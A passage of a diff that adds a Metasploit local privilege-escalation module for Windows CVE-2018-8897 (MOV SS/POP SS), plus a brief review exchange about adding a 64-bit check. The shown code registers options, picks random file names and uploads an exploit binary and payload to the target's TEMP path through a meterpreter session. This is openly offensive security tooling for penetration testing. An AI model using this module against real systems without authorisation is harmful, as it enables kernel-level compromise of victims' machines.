modules/exploits/windows/local/mov_ss.rb

```diff
@@ -0,0 +1,169 @@
+        excpetions that are deferred by MOV SS or POP SS.
+
+        This module will upload the pre-compiled exploit and use it to execute the final
+        payload in order to gain remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nick Peterson',        # Original discovery (@nickeverdox)
+          'Nemanja Mulasmajic',   # Original discovery (@0xNemi)
+          'Can Bölük <can1357>',  # PoC
+          'bwatters-r7'           # msf module
+        ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        =>
+        [
+          [ 'Windows', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 08 2018',
+      'References'     =>
+        [
+          ['CVE', '2018-8897'],
+          ['EDB', '44697'],
+          ['BID', '104071'],
+          ['URL', 'https://github.com/can1357/CVE-2018-8897/'],
+          ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+        [false, 'The number of seconds to delay before executing the exploit', 3])
+    ])
+  end
+
+  def setup
+    super
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_path = "#{temp_path}\\#{payload_name}"
+    @exploit_path = "#{temp_path}\\#{exploit_name}"
+    @payload_exe = generate_payload_exe
+  end
+
+  def validate_active_host
+    begin
+      host = session.session_host
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Msf::Exploit::Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    if sysinfo['OS'] =~ /XP/
```

Comment:
The exploit code is only in 64-bit, so I'll add a deeper check

Reply:
Ah good call. Thanks!